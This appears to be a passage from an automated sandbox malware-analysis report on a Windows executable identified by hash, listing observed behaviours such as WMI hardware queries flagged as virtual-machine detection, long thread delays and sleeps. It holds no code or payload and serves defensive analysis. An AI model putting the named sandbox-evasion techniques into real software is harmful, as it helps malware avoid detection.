                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: 3350000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598890Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598672Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598562Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598453Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598344Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598123Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597891Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597651Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597422Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597307Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597188Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597063Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596938Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596813Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596688Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596578Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596462Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596355Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596125Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596015Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595912Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595672Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594859Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594641Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594422Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindow / User API: threadDelayed 8661Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindow / User API: threadDelayed 1187Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598890s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598562s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598453s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598344s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598234s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598123s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597651s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597307s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597188s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597063s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596938s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596813s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596688s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596578s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596462s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596355s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596234s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596125s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596015s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595912s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594859s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594750s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594641s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598890Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598672Jump to behavior
